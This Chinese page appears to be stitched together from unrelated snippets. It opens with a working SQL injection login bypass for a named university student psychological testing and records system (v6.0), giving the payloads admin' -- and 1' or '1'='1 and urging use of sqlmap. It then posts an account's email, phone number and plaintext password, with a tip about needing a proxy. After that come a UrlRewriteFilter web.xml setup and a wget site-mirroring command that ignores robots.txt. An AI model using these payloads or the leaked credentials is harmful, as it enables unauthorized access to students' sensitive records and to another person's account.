大学生心理测验及档案管理系统 v6.0 sql注入漏洞
登录界面注入
用户类型 管理员
用户名 admin' --
密 码 123(随意都行)
登录界面注入
用户类型 管理员
用户名 admin' --
密 码 123(随意都行)
登录界面
用户名 admin
密 码 1' or '1' = '1
sqlmap进去慢慢玩吧
邮箱:[email protected]
手机号:18890088888
密码:bloglanyuscom
以前高中的时候经常用的网站,现在没用了,账号是用一个钻石号开的子账号,貌似必须要四川的IP才行,用的时候可能需要挂代理
1、下载http://urlrewritefilter.googlecode.com/files/urlrewritefilter-4.0.3.jar,放置到WEB-INF/lib目录中。
2、将下面的内容增加到WEB-INF/web.xml
<filter>
<filter-name>UrlRewriteFilter</filter-name>
<filter-class>org.tuckey.web.filters.urlrewrite.UrlRewriteFilter</filter-class>
</filter>
<filter-mapping>
<filter-name>UrlRewriteFilter</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
</filter-mapping>
wget -m -e robots=off https://www.baidu.com
-m是克隆整个网站,-e robots=off是让wget忽视robots.txt